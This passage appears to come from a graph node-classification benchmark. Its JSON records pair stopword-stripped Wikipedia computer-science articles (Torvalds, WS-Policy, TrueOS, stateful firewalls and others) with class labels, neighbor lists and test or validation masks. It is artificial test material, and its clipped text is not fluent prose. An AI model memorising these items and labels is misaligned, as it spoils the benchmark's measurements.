running introductory computer laboratory exercises students instructed course attendees send e-mail test tove responded e-mail asking date tove linus later married three daughters patricia miranda born 1996 daniela yolanda born 1998 celeste amanda born 2000 two born united states linux kernel reboot system call accepts dates birth written hexadecimal magic values torvalds described completely a-religious—atheist adding find people seem think religion brings morals appreciation nature actually think detracts gives people excuse say 'oh nature created act creation seen something miraculous appreciate fact 'wow incredible something like could happened first place later added europe religion mostly personal issue united states become politicized discussing issue church state separation torvalds also said yeah kind ironic many european countries actually kind legal binding state state religion however story march linuxworld conference titled linus liberator torvalds quoted saying like two golden rules life one 'do unto others would want unto reason people associate christianity 'm christian 'm agnostic rule 'be proud 2010 torvalds became united states citizen registered vote united states unaffiliated u.s. political party saying way much personal pride want associated quite frankly linus developed interest scuba diving early 2000s went achieve numerous certifications later led creating subsurface project time magazine recognized torvalds multiple times infoworld presented 2000 award industry achievement 2005 torvalds appeared one best managers survey businessweek 2006 business 2.0 magazine named one 10 people n't matter growth linux shrunk torvalds individual impact summer 2004 viewers yle finnish broadcasting company placed torvalds 16th network 100 greatest finns 2010 part series called britannica guide world influential people torvalds listed among 100 influential inventors time october 11 2017 linux company suse made song titled linus said",
    "neighbors": [
      1026,
      7689,
      3082,
      5644,
      9742,
      5139,
      2581,
      8214,
      10780,
      10785,
      3618,
      6691,
      6180,
      2597,
      9253,
      9257,
      11305,
      8242,
      9266,
      56,
      59,
      2109,
      4673,
      10817,
      6213,
      10822,
      8263,
      7241,
      8268,
      589,
      4177,
      9810,
      8787,
      1110,
      3685,
      5222,
      9320,
      10856,
      10860,
      8301,
      2671,
      7279,
      7281,
      7793,
      3189,
      9845,
      5755,
      11388,
      4734,
      7812,
      8837,
      8326,
      9353,
      6797,
      4238,
      10382,
      8848,
      657,
      2195,
      2711,
      6808,
      9882,
      10394,
      1694,
      6302,
      9374,
      3745,
      673,
      2211,
      2723,
      8354,
      8364,
      7854,
      2738,
      1717,
      4790,
      5815,
      8373,
      10933,
      5822,
      7364,
      1736,
      2762,
      8907,
      2253,
      8909,
      3791,
      7887,
      3802,
      8410,
      10971,
      10461,
      4830,
      4831,
      8928,
      1761,
      2278,
      233,
      4841,
      6890,
      7913,
      9452,
      9455,
      7920,
      10482,
      5363,
      9461,
      2294,
      8439,
      2809,
      249,
      6393,
      8700,
      7421,
      8957,
      7938,
      11012,
      4360,
      7435,
      5390,
      4367,
      2321,
      1813,
      3350,
      4887,
      792,
      3352,
      7450,
      10016,
      802,
      5410,
      6947,
      10530,
      295,
      5931,
      7470,
      7983,
      823,
      4919,
      6968,
      7992,
      11069,
      318,
      3903,
      2375,
      3911,
      843,
      6988,
      10063,
      11602,
      4437,
      5975,
      6489,
      9054,
      2914,
      10596,
      9064,
      10601,
      10091,
      7020,
      7534,
      1394,
      9074,
      1396,
      5492,
      7540,
      11123,
      11643,
      10620,
      8573,
      1406,
      6529,
      8066,
      4483,
      900,
      5514,
      11659,
      4493,
      10127,
      7057,
      10642,
      1939,
      11155,
      9621,
      3478,
      8602,
      11678,
      7584,
      1444,
      1445,
      9637,
      935,
      10149,
      4521,
      10666,
      4011,
      9646,
      11184,
      439,
      9660,
      10687,
      4039,
      457,
      5067,
      8147,
      11221,
      472,
      477,
      9693,
      3039,
      9696,
      2529,
      6625,
      11232,
      7140,
      485,
      2021,
      8676,
      1513,
      3055,
      5105,
      6129,
      8177,
      2036,
      8186,
      9723,
      2044,
      3582
    ],
    "mask": "Test"
  },
  {
    "node_id": 6353,
    "label": 8,
    "text": "WS-ReliableMessaging:ws-reliablemessaging ws-reliablemessaging describes protocol allows soap messages reliably delivered distributed applications presence software component system network failures original specification written bea systems microsoft ibm tibco march 2003 subsequently refined next two years february 2005 version submitted oasis web services reliable exchange ws-rx technical committee june year resulting ws-reliablemessaging 1.1 approved oasis standard june 14 2007 v1.2 approved february 2 2009 prior ws-reliablemessaging oasis produced competing standard ws-reliability supported coalition vendors namely fujitsu hitachi nec oracle corporation progress software sun microsystems vendors also support ws-reliablemessaging specification application source wishes reliably send messages application destination ad unreliable infrastructure accomplish make use reliable messaging source rms reliable messaging destination rmd sends message rms rms uses ws-reliablemessaging ws-rm protocol transmit message rmd rmd delivers message ad rms transmit message rmd reason must raise exception otherwise indicate message transmitted rms may implemented within process space may separate components similarly ad rmd may exist within process space may separate components important thing keep mind ws-rm specification deals contents behavior messages appear wire messages sent rms delivered rmd ad whether messages persisted on-disk held memory etc none considerations part ws-rm specification ws-rm protocol defines supports number delivery assurances ws-reliablemessaging uses extensibility model soap wsdl ws-reliablemessaging define features required complete messaging solution ws-reliablemessaging building block used conjunction web services specifications application-specific protocols build complete messaging solution article attempts make case reliability needed message level required business level",
    "neighbors": [
      9665,
      8355,
      10020,
      7878,
      8070,
      8425,
      4397,
      4974,
      3323,
      9137,
      4979,
      10229,
      10486,
      1851
    ],
    "mask": "Test"
  },
  {
    "node_id": 6354,
    "label": 7,
    "text": "International_Middleware_Conference:international middleware conference international middleware conference brings together academic industrial delegates interest development optimisation evaluation evolution middleware first instance middleware conference held 1998 since 2003 conference run annually many recent conference events acm/ifip/usenix supported events middleware uses single-track conference program although includes growing number submission categories 2013 include conference also includes number six 2012 workshops typically co-located main conference",
    "neighbors": [
      8122,
      7983
    ],
    "mask": "None"
  },
  {
    "node_id": 6355,
    "label": 2,
    "text": "What_(ITS_utility):utility typed prompt small information utility available incompatible timesharing system could provide information incoming email bus schedule mit campus executable source files answer user humorous manner written midas assembly language still used instances maintained across web last traceable edit source code ken l. harrenstien 16 may 1988 without arguments would print information inbox status argument bus would print information next buses leaving mit campus asked source name responded paths source files corresponding name knowing answer would often resort humor finally displayed amount introspection",
    "neighbors": [
      3216,
      5361,
      1147
    ],
    "mask": "None"
  },
  {
    "node_id": 6356,
    "label": 1,
    "text": "UnixODBC:unixodbc unixodbc open-source project implements odbc api code provided gnu gpl/lgpl built used many different operating systems including versions unix linux mac os x ibm os/2 microsoft interix goals project include unixodbc project first started early months 1999 peter harvey created time developers iodbc another open source odbc implementation willing lgpl code expand api include current odbc 3 api specification consider addition gui based configuration tools worthwhile iodbc parts added applications use odbc interface may use iodbc unixodbc without change cases result projects adhering single odbc specification original driver manager basic driver manager rewritten easysoft nick gorham soon project started nick assumed leadership project july 1999 peter harvey continuing work supporting code development unixodbc progressed since origin contributions many developers open source community also commercial database companies including ibm oracle corporation sap included part standard installation many linux distributions unixodbc project split several projects hosted sourceforge split done allow faster releases supporting work maintaining focus stability consistency core code",
    "neighbors": [
      5612,
      6797,
      7983,
      5492,
      823,
      5210,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 6357,
    "label": 8,
    "text": "WS-Policy:ws-policy ws-policy specification allows web services use xml advertise policies security quality service etc web service consumers specify policy requirements ws-policy w3c recommendation september 2007 ws-policy represents set specifications describe capabilities constraints security business policies intermediaries end points example required security tokens supported encryption algorithms privacy rules associate policies services end points assertions either requirements put upon web service advertisement policies web service two operators xml tags used make statements policy combinations logically empty wsp tag makes assertions provider consumer specify policy effective policy computed usually consists intersection policies new policy contains assertions made sides contradict however synonymous assertions considered incompatible policy intersection easily explained fact policy intersection syntactic approach incorporate semantics assertions furthermore ignores assertion parameters opposed name might suggest policy intersection although quite similar set-intersection",
    "neighbors": [
      1476,
      10949,
      7878,
      8425,
      6284,
      10829,
      4974,
      8597,
      10396
    ],
    "mask": "None"
  },
  {
    "node_id": 6358,
    "label": 6,
    "text": "Directory_structure:directory structure computing directory structure way operating system file system files displayed user files typically displayed hierarchical tree structure filename string used uniquely identify file stored file system computer advent 32-bit operating systems file names typically limited short names 6 14 characters size modern operating systems typically allow much longer filenames 250 characters per pathname element dos windows os/2 root directory drive example root directory usually c directory separator usually operating system also internally recognizes physical virtual drives named drive letter opposed combined one means formal root directory rather independent root directories drive however possible combine two drives one virtual drive letter setting hard drive raid setting 0 following folders may appear root boot partition unix unix-like operating systems use filesystem hierarchy standard common form directory structures files directories appear root directory even stored different physical devices",
    "neighbors": [
      2432,
      3330,
      5514,
      6797,
      5397,
      8988,
      6813,
      9762,
      2213,
      5158,
      7847,
      1193,
      2095,
      7983,
      52,
      1844,
      5819,
      9533,
      960,
      3522,
      5969,
      5975,
      9946,
      5598,
      1632,
      1509,
      6126,
      7663,
      9840,
      3571,
      5492,
      7540,
      5754
    ],
    "mask": "Test"
  },
  {
    "node_id": 6359,
    "label": 1,
    "text": "DB-Engines_ranking:db-engines ranking db-engines ranking ranks database management systems popularity covering 340 systems ranking criteria include number search engine results searching system names google trends stack overflow discussions job offers mentions systems number profiles professional networks linkedin mentions social networks twitter ranking updated monthly described cited various database-related articles grouping specific database features like database model type license regularly published statistics reveal historical trends used strategic statements db-engines dbms portal created 2012 maintained austrian consulting company solid based ranking db-engines grants yearly award system gained popularity within year award winners ranking might measure actual usage number installations systems may may correspond number users furthermore quality features systems direct impact ranking",
    "neighbors": [
      10340,
      9286,
      10471,
      4200,
      8201,
      974,
      7347,
      10518,
      5047,
      11030,
      6458,
      8539
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6360,
    "label": 4,
    "text": "Cyber_security_standards:cyber security standards information storage transit applications services systems connected directly indirectly networks principal objective reduce risks including prevention mitigation cyber-attacks published materials consist collections tools policies security concepts security safeguards guidelines risk management approaches actions training best practices assurance technologies cybersecurity standards existed several decades users providers collaborated many domestic international forums effect necessary capabilities policies practices generally emerging work stanford consortium research information security policy 1990s 2016 us security framework adoption study reported 70 surveyed organizations nist cybersecurity framework popular best practice information technology computer security many note requires significant investment iso/iec 27001 part growing iso/iec 27000 family standards information security management system isms standard last revision published october 2013 international organization standardization iso international electrotechnical commission iec full name iso/iec 27001:2013 – information technology – security techniques – information security management systems – requirements iso/iec 27001 formally specifies management system intended bring information security explicit management control iso/iec 27002 incorporates mainly part 1 bs 7799 good security management practice standard latest versions bs 7799 bs 7799-3 sometimes iso/iec 27002 therefore referred iso 17799 bs 7799 part 1 sometimes refers part 1 part 7 bs 7799 part 1 provides outline good practice guide cybersecurity management whereas bs 7799 part 2 iso/iec 27001 normative therefore provide framework certification iso/iec 27002 high level guide cybersecurity beneficial explanatory guidance management organisation obtain certification iso/iec 27001 standard certification obtained lasts three years depending auditing organisation intermediate audits may carried three years iso/iec 27001 isms replaces bs 7799 part 2 since backward compatible organization working toward bs 7799 part 2 easily transition iso/iec 27001 certification process also transitional audit available make easier organization bs 7799 part 2-certified organization become iso/iec 27001-certified iso/iec 27002 provides best practice recommendations information security management use responsible initiating implementing maintaining information security management systems isms states information security systems required implement iso/iec 27002 control objectives without iso/iec 27001 iso/iec 27002 control objectives ineffective iso/iec 27002 controls objectives incorporated iso 27001 annex a. iso/iec 21827 sse-cmm – iso/iec 21827 international standard based systems security engineering capability maturity model sse-cmm measure maturity iso controls objectives north american electric reliability corporation nerc addresses patching nerc cip 007-6 requirement 2 summarily requires bulk power system bps operators/owners identify source sources utilized provide entiter security related patches cyber assets utilized operation registered entities required check new patches every thirty five calendar days upon identification new patch entities required evaluate applicability patch complete mitigation installation activities within 35 calendar days completion assessment applicability.e bps.y initial attempt create information security standards electrical power industry created nerc 2003 known nerc css cyber security standards subsequent css guidelines nerc evolved enhanced requirements widely recognized modern nerc security standard nerc 1300 modification/update nerc 1200 newest version nerc 1300 called cip-002-3 cip-009-3 cip=critical infrastructure protection standards used secure bulk electric systems although nerc created standards within areas bulk electric system standards also provide network security administration still supporting best-practice industry processes standard develops called “ common criteria ” allows many different software hardware products integrated tested secure way iasme governance uk-based standard information assurance small-to-medium enterprises smes provides criteria certification small-to-medium business cybersecurity readiness also allows small medium business provide potential existing customers clients accredited measurement cybersecurity posture enterprise protection personal/business data iasme governance standard developed enable businesses achieve accreditation similar iso 27001 reduced complexity cost administrative overhead specifically focused sme recognition difficult small cap businesses achieve maintain iso 27001 certifications iasme governance standard include free basic cyber security insurance uk-based sme applicants cost certification progressively graduated based upon employee population sme e.g. 10 fewer 11 25 26 100 101 250 employees certification based upon self-assessment iasme questionnaire third-party professional assessor insurance companies reduce premiums cybersecurity related coverage based upon iasme certification october 2016 federal reserve board office comptroller currency federal deposit insurance corporation jointly issued advance notice proposed rulemaking anpr regarding cyber risk management standards regulated entities anpr aims enhance ability large interconnected financial services entities prevent recover cyber attacks goes beyond existing requirements proposal requires entities total assets 50 billion third party service providers take steps strengthen incident response programs enhance cyber risk governance management practices may 2017 us based federal financial institutions examination council issued cyber security assessment tool tool includes completing inherent risk profile organization covers five areas european telecommunications standards institute etsi established new cyber security committee tc cyber 2014 meet growing demand ev guidance protect internet communications business carries tc cyber working closely relevant stakeholders develop appropriate standards increase privacy security organisations citizens across europe committee looking particular security infrastructures devices services protocols well security tools techniques ensure security offers security advice guidance users manufacturers network infrastructure operators standards freely available on-line principal work item effort production cyber security ecosystem standardization activities 1990s information security forum isf published comprehensive list best practices information security published standard good practice sogp isf continues update sogp every two years latest version published 2018 among programs isf offers member organizations comprehensive benchmarking program based sogp furthermore important charge security management understand adhere nerc cip compliance requirements ansi/isa 62443 series standards technical reports related information define procedures implementing secure industrial automation control systems iacs guidance applies stakeholders implementing managing iacs documents originally referred ansi/isa-99 isa99 standards created international society automation isa publicly released american national standards institute ansi documents 2010 renumbered ansi/isa-62443 series change intended align isa ansi document numbering corresponding international electrotechnical commission iec standards isa99 remains name industrial automation control system security committee isa since 2002 committee developing multi-part series standards technical reports subject iacs security work products submitted isa approval publishing ansi also submitted iec input iec 62443 series international standards following iec standards development process established 2007 international security compliance institute isci created first conformity assessment scheme commonly known certification scheme ansi/isa 62443 standards program certifies commercial off-the-shelf cots automation control systems iot devices addressing securing control systems supply chain isci development processes include maintenance policies ensure isasecure certifications remain alignment iec 62443 standards evolve ansi/isa 62443 standards designed horizontally address technical cybersecurity requirements cross-section industries isasecure working groups included subject matter experts traditional process industries building management system suppliers asset owners isasecure scheme requires products properly tested supplier development process conformance ansi/isa 62443-4-1. exida united states first certification body accredited isasecure scheme american national standards institute ansi followed control systems security center – certification laboratory cssc-cl accredited japan accreditation board jab tüv rheinland accredited deutsche akkreditierungsstelle dakks five additional certification bodies accredited 2019 including tuv sud two cots product certifications available isasecure® brand isasecure-csa component security assurance certifying automation products iec 62443-4-1 iec 62443-4-2 cybersecurity standards isasecure-ssa system security assurance certifying systems iec 62443-3-3 standard third certification sdla secure development lifecycle assurance available isci certifies automation systems development organizations iec 62443-4-1 cybersecurity standard isasecure 62443 conformity assessment scheme iso 17065 program whose labs certification bodies cb independently accredited ansi/anab jab dakks singapore accreditation council global iso 17011 accreditation bodies ab certification labs must also meet iso 17025 lab accreditation requirements ensure consistent application certification requirements recognized tools mutual recognition arrangements mra iaf ilac others accreditation isasecure labs isa 17011 accreditation bodies ensures certificates issued isasecure labs globally recognized iec-62443 cybersecurity standards multi-industry standards listing cybersecurity protection methods techniques documents result iec standards creation process ansi/isa-62443 proposals inputs submitted country committees review done comments regarding changes submitted comments reviewed various iec 62443 committees comments discussed changes made agreed upon many members iec committees persons isa s99 committees date fundamental concepts original ansi/isa 62443 documents utilized iec 62443 certification schemes also established several global certification bodies defined scheme based upon referenced standards procedures describes test methods surveillance audit policy public documentation policies specific aspects program cybersecurity certification programs iec 62443 standards offered globally several recognized cbs including exida sgs-tüv saar tüv nord tüv rheinland tüv sud ul certx automation system market space cybersecurity certifications done exida global infrastructure established ensure consistent evaluation per standards impartial third party organizations called certification bodies cb accredited operate iso/iec 17065 iso/iec 17025 certification bodies accredited perform auditing assessment testing work accreditation body ab often one national ab country abs operate per requirements iso/iec 17011 standard contains requirements competence consistency impartiality accreditation bodies accrediting conformity assessment bodies abs members international accreditation forum iaf work management systems products services personnel accreditation international laboratory accreditation cooperation ilac laboratory accreditation multilateral recognition arrangement mla abs ensure global recognition accredited cbs ...",
    "neighbors": [
      7553,
      3843,
      5636,
      5764,
      10756,
      5002,
      9356,
      8206,
      399,
      9102,
      3473,
      6162,
      7441,
      7828,
      8978,
      11409,
      10392,
      5373,
      5246,
      9242,
      4892,
      5404,
      2975,
      2213,
      8998,
      939,
      7979,
      3629,
      9646,
      1711,
      7855,
      433,
      1970,
      5433,
      10938,
      7739,
      3262,
      9791,
      4672,
      11198,
      1093,
      3525,
      4678,
      4936,
      7368,
      8904,
      6091,
      9160,
      3789,
      10821,
      10823,
      4304,
      2902,
      9688,
      7898,
      7515,
      3941,
      6373,
      11621,
      5353,
      107,
      11244,
      9460,
      1781,
      6645,
      3447,
      2041,
      5245,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 6361,
    "label": 2,
    "text": "TrueOS:trueos trueos formerly pc-bsd pcbsd unix-like server-oriented operating system built upon recent releases freebsd-current 2018 aimed easy install using graphical installation program easy ready-to-use immediately providing kde sc lumina lxde mate xfce desktop environment june 2018 developers announced trueos core os provides basis projects thus n't include graphical installer anymore graphical end-user-orientated oses based trueos ghostbsd trident trueos provides official binary nvidia intel drivers hardware acceleration optional 3d desktop interface kwin wine ready-to-use running microsoft windows software trueos able run linux software addition freebsd ports collection .txz package manager trueos supports openzfs installer offers disk encryption geli trueos founded freebsd professional kris moore early 2005 pc-bsd august 2006 voted beginner-friendly operating system osweekly.com first beta pc-bsd consisted gui installer get user running freebsd 6 system kde3 pre-configured major innovation time anyone wishing install freebsd would manually tweak run text installer kris moore goal make freebsd easy everyone use desktop since diverged even direction usability including additional gui administration tools .pbi application installers pc-bsd application installer management involved different approach installing software many unix-like operating systems including version 8.2 means pbidir website instead using freebsd ports tree directly although remained available pc-bsd used files .pbi filename extension push button installer double-clicked brought installation wizard program autobuild system tracked freebsd ports collection generated new .pbi files daily software packages dependencies installed inside .pbi files self-contained directories /programs convention aimed decrease confusion binary programs reside remove possibility package breaking system libraries upgraded changed prevent dependency hell october 10 2006 pc-bsd acquired enterprise-class hardware solution provider ixsystems ixsystems employs kris moore full-time developer leader project november 2007 ixsystems entered distribution agreement fry electronics whereby fry electronics stores nationwide carry boxed copies pc-bsd version 1.4 da vinci edition january 2008 ixsystems entered similar agreement micro center september 1 2016 pc-bsd team announced name operating system change trueos along rebranding project also became rolling release distribution based freebsd-current branch november 15 2016 trueos began transition freebsd rc.d openrc default init system apart gentoo/alt openrc initially developed major bsd based operating system using openrc july 2018 trueos announced would spin desktop edition separate project named project trident since version 7 pc-bsd began following numbering system freebsd since version 9.0 kde sc customized support tighter application integration .txz package management system longer desktop environment supported pc-bsd manual installation desktops xfce gnome technically possible earlier releases none supported earlier versions major functionality lost using pc-bsd special build kde sc starting version 9.0 pc-bsd added desktop environments including gnome xfce lxde mate pc-bsd used support amd64 i686 architectures support i686 dropped version 9.2 starting september 2016 rebranding pc-bsd trueos became rolling release distribution based freebsd current branch trueos package manager takes similar approach installing software many unix-like operating systems instead using freebsd ports tree directly although remains available trueos uses files .txz filename extension packages contain compiled ports autobuild system tracks freebsd ports collection generates new .txz files daily trueos package management system aims visually similar major operating systems microsoft windows apple macos applications installed single download link graphical prompts maintaining internally traditional .txz package management systems many unix-like systems use trueos package manager also takes care creating categorized links kde menu kde sc desktop 2014 pc-bsd project announced development new desktop environment scratch named lumina ken moore main developer lumina based qt toolkit july 2016 lumina web site desktop environment application development toolkit aims graphical interface uses plugins customization trueos originally licensed gnu general public license gpl developers impression applications using qt trueos uses interface development must licensed gpl q public license upon discovering fact restriction trueos developers later relicensed code bsd-like 3-clause license trueos trueos logo registered trademarks ixsystems inc new york city *bsd user group runs service named dmesgd provides user-submitted dmesg information different computer hardware laptops workstations single-board computers embedded systems virtual machines etc capable running trueos according trueos wiki trueos following hardware requirements uefi support amd64 added installer boot manager since version 10.1 default efi boot manager refind includes acpi detection setup root system description pointer rsdp extended system descriptor table xsdt root system description table rsdt pass-through values kernel new installation needed order install uefi support requires creation small fat partition current uefi support secure boot",
    "neighbors": [
      10760,
      10761,
      2061,
      9743,
      7698,
      8213,
      8725,
      6680,
      4636,
      9245,
      9762,
      5155,
      5670,
      7722,
      5677,
      1071,
      1080,
      5177,
      9784,
      10817,
      3651,
      7748,
      8266,
      5710,
      7249,
      3667,
      6227,
      9306,
      6747,
      607,
      1632,
      9320,
      9324,
      8816,
      1138,
      7794,
      9844,
      2168,
      633,
      8316,
      7293,
      9342,
      9343,
      2179,
      2180,
      4745,
      6797,
      10900,
      10394,
      2212,
      4775,
      684,
      6828,
      3248,
      1718,
      5819,
      190,
      11459,
      9927,
      8395,
      8909,
      4302,
      6864,
      2259,
      10455,
      6361,
      8410,
      8413,
      6371,
      741,
      231,
      2281,
      9452,
      11506,
      5363,
      1273,
      6393,
      7425,
      11525,
      1801,
      7435,
      7947,
      9487,
      274,
      788,
      1813,
      5397,
      8476,
      1316,
      3366,
      6438,
      10535,
      4908,
      6446,
      1839,
      7983,
      9009,
      1842,
      11573,
      823,
      2872,
      7483,
      3399,
      3918,
      2383,
      850,
      4951,
      6491,
      9564,
      2401,
      7521,
      1379,
      1891,
      9063,
      873,
      8554,
      10096,
      2417,
      7027,
      2421,
      2424,
      7552,
      3969,
      5506,
      8068,
      3462,
      1927,
      8582,
      2955,
      9625,
      1946,
      414,
      5534,
      11184,
      11698,
      6583,
      1465,
      10172,
      3006,
      9151,
      9153,
      8644,
      9671,
      5578,
      5067,
      5070,
      463,
      2010,
      10202,
      3551,
      7139,
      7140,
      998,
      6119,
      5096,
      4073,
      5612,
      2545,
      1522,
      3058,
      9201,
      3573
    ],
    "mask": "Test"
  },
  {
    "node_id": 6362,
    "label": 0,
    "text": "Acoustic_model:acoustic model acoustic model used automatic speech recognition represent relationship audio signal phonemes linguistic units make speech model learned set audio recordings corresponding transcripts created taking audio recordings speech text transcriptions using software create statistical representations sounds make word modern speech recognition systems use acoustic model language model represent statistical properties speech acoustic model models relationship audio signal phonetic units language language model responsible modeling word sequences language two models combined get top-ranked word sequences corresponding given audio segment modern speech recognition systems operate audio small chunks known frames approximate duration 10ms per frame raw audio signal frame transformed applying mel-frequency cepstrum coefficients transformation commonly known mel frequency cepstral coefficients mfcc used input acoustic model along features recently use convolutional neural networks led big improvements acoustic modeling audio encoded different sampling rates i.e samples per second – common 8 16 32 44.1 48 96 khz different bits per sample common 8-bits 16-bits 24-bits 32-bits speech recognition engines work best acoustic model use trained speech audio recorded sampling rate/bits per sample speech recognized limiting factor telephony based speech recognition bandwidth speech transmitted example standard land-line telephone bandwidth 64 kbit/s sampling rate 8 khz 8-bits per sample 8000 samples per second 8-bits per sample 64000 bit/s therefore telephony based speech recognition acoustic models trained 8 khz/8-bit speech audio files case voice ip codec determines sampling rate/bits per sample speech transmission codecs higher sampling rate/bits per sample speech transmission improve sound quality necessitate acoustic models trained audio data matches sampling rate/bits per sample speech recognition standard desktop pc limiting factor sound card sound cards today record sampling rates 16 khz-48 khz audio bit rates 8 16-bits per sample playback 96 khz general rule speech recognition engine works better acoustic models trained speech audio data recorded higher sampling rates/bits per sample using audio high sampling rate/bits per sample slow recognition engine compromise needed thus desktop speech recognition current standard acoustic models trained speech audio data recorded sampling rates 16 khz/16bits per sample",
    "neighbors": [
      9798,
      9898,
      10557,
      3998
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6363,
    "label": 4,
    "text": "Stockade_(software):stockade software stockade tcp-layer blocking tool written c++ denies tcp/ip access registered ip addresses using ipfw packet filter targets spam prevention may also used attackers e.g brute force password crackers approach leverages superior determination exhibited legitimate senders respect may considered similar greylisting originally authors conceived mt proxy rate-limit smtp connections messages believed spam worked adding dummynet rule frequent senders sending messages triggered unreliable statistical analysis key limitation original scheme consumption local resources smtp proxy stockade approach introduces notion inbound tcp connection may rejected random probability proportional level spam already seen connection ’ originator configurable period time probability subject decay configured halving time period ip address eventually rehabilitated way stockade provides fully automatic spam mitigation",
    "neighbors": [
      9824,
      6916,
      4772,
      3717,
      10341,
      7983,
      9909,
      1273,
      10906,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 6364,
    "label": 4,
    "text": "Stateful_firewall:stateful firewall computing stateful firewall network firewall tracks operating state characteristics network connections traversing firewall configured distinguish legitimate packets different types connections packets matching known active connection allowed pass firewall stateful packet inspection spi also referred dynamic packet filtering security feature often included business networks stateful firewall technology introduced check point software firewall-1 product 1994 development stateful firewalls firewalls stateless stateless firewall treats network frame packet individually packet filters operate osi network layer layer 3 function efficiently look header part packet keep track packet context nature traffic firewall way knowing given packet part existing connection trying establish new connection rogue packet modern firewalls connection-aware state-aware offering network administrators finer-grained control network traffic classic example network operation may fail stateless firewall file transfer protocol ftp design protocols need able open connections arbitrary high ports function properly since stateless firewall way knowing packet destined protected network host destination port 4970 example part legitimate ftp session drop packet stateful firewalls application inspection solve problem maintaining table open connections inspecting payload packets intelligently associating new connection requests existing legitimate connections early attempts producing firewalls operated application layer top seven-layer osi model method required exorbitant amounts computing power commonly used modern implementations stateful firewall keeps track state network connections tcp streams udp communication able hold significant attributes connection memory attributes collectively known state connection may include details ip addresses ports involved connection sequence numbers packets traversing connection stateful inspection monitors incoming outgoing packets time well state connection stores data dynamic state tables cumulative data evaluated filtering decisions would based administrator-defined rules also context built previous connections well previous packets belonging connection cpu intensive checking performed time setup connection entries created tcp connections udp streams satisfy defined security policy packets session processed rapidly simple fast determine whether belongs existing pre-screened session packets associated sessions permitted pass firewall sessions match policy denied packets match existing table entry order prevent state table filling sessions time traffic passed certain period stale connections removed state table many applications therefore send keepalive messages periodically order stop firewall dropping connection periods user-activity though firewalls instructed send messages applications depending connection protocol maintaining connection state less complex firewall example tcp inherently stateful protocol connections established three-way handshake syn syn-ack ack ended fin fin-ack ack exchange means packets syn header received firewall interpreted open new connections service requested client available server respond syn-ack packet firewall also track firewall receives client ack response transfers connection established state connection authenticated bidirectionally allows tracking future packets established connection simultaneously firewall drops packets associated existing connection recorded state table syn packets preventing unsolicited connections protected machine black hat hacking connection protocols namely udp icmp based bidirectional connections like tcp making stateful firewall somewhat less secure order track connection state cases firewall must transfer sessions established state seeing first valid packet track connection addresses ports following packets source destination unlike tcp connections closed fin ack exchange connectionless protocols allow session end time-out example enables udp hole punching keeping track connection state stateful firewalls provide added efficiency terms packet inspection existing connections firewall need check state table instead checking packet firewall rule set extensive additionally case match state table firewall need perform deep packet inspection packet filtering alone regarded providing enough protection order effectively block peer-to-peer-related network traffic needed firewall application filtering regarded extension stateful packet inspection stateful packet inspection determine type protocol sent port application-level filters look protocol used example application-level filter might able tell difference http traffic used access web page http traffic used file sharing whereas firewall performing packet filtering would treat http traffic equally application layer firewalls generally slower stateful inspection application-layer firewalls sometimes implemented using application proxies two tcp connections established one packet source firewall another firewall packet destination application proxies intercept arriving packets behalf destination examine application payload relay permitted packets destination suspicious data dropped client server never communicate directly proxies necessarily involve protocol stack overhead inspecting packets network layer furthermore unique proxy required application proxy firewalls less flexible slower upgrade stateful inspection firewalls nevertheless application-level proxies application-aware proxies easily handle complex protocols like h.323 sip used videoconferencing voip voice ip risk vulnerabilities individual protocol decoders could allow attacker gain control firewall concern highlights need keep firewall software updated stateful firewalls also raise possibility individual hosts tricked soliciting outside connections possibility completely eliminated auditing host software firewalls defeated way simply viewing web page either javascript enabled clicking button",
    "neighbors": [
      2049,
      2563,
      521,
      8211,
      10271,
      9764,
      550,
      10790,
      8753,
      569,
      5178,
      9279,
      2118,
      8265,
      2136,
      9318,
      8816,
      4725,
      5749,
      10872,
      10889,
      6797,
      1172,
      11413,
      3742,
      3243,
      1708,
      4268,
      10924,
      10417,
      7859,
      2228,
      3770,
      10433,
      7364,
      11468,
      4814,
      9423,
      7376,
      10451,
      3299,
      5860,
      10987,
      8943,
      9971,
      1273,
      3322,
      9983,
      1792,
      9496,
      5402,
      6431,
      10531,
      5924,
      8998,
      3885,
      823,
      11577,
      11073,
      1858,
      836,
      5959,
      10574,
      4435,
      11606,
      9048,
      4953,
      6490,
      2907,
      2912,
      3941,
      3942,
      8039,
      2430,
      4480,
      3482,
      1436,
      4511,
      8640,
      5057,
      7121,
      10708,
      4568,
      5084,
      8668,
      11248,
      9722,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 6365,
    "label": 6,
    "text": "OrangeFS:orangefs orangefs open-source parallel file system next generation parallel virtual file system parallel file system type distributed file system distributes file data across multiple servers provides concurrent access multiple tasks parallel application orangefs designed use large-scale cluster computing used companies universities national laboratories similar sites worldwide orangefs emerged development branch pvfs2 much history shared history pvfs spanning twenty years extensive history behind orangefs summarized time line development branch new direction development orangefs branch begun 2007 leaders pvfs2 user community determined orangefs often described next generation pvfs2",
    "neighbors": [
      5120,
      2564,
      6669,
      3598,
      10257,
      9236,
      6677,
      5142,
      8214,
      3611,
      9249,
      9762,
      5158,
      2555,
      7225,
      1594,
      11323,
      8772,
      7248,
      1109,
      4708,
      9836,
      7789,
      9333,
      6263,
      9335,
      9343,
      7818,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      5293,
      7344,
      2230,
      5816,
      1212,
      8380,
      3265,
      10951,
      9420,
      7378,
      3795,
      4819,
      8402,
      8404,
      728,
      8410,
      739,
      7907,
      8938,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      3328,
      11012,
      2314,
      8461,
      6416,
      1810,
      6935,
      11033,
      287,
      1825,
      6434,
      5413,
      3368,
      4907,
      9004,
      302,
      7983,
      6961,
      6963,
      1844,
      823,
      6970,
      11072,
      3909,
      2378,
      4431,
      5969,
      346,
      2395,
      2397,
      10596,
      2407,
      10087,
      11638,
      6519,
      376,
      11128,
      890,
      7554,
      8075,
      7565,
      6545,
      10641,
      5013,
      11675,
      11676,
      414,
      2974,
      7070,
      10151,
      4012,
      1454,
      6062,
      8114,
      7603,
      8631,
      1464,
      1978,
      8643,
      7126,
      2015,
      1509,
      9189,
      7663,
      11256,
      6651,
      2045,
      3582
    ],
    "mask": "Test"
  },
  {
    "node_id": 6366,
    "label": 8,
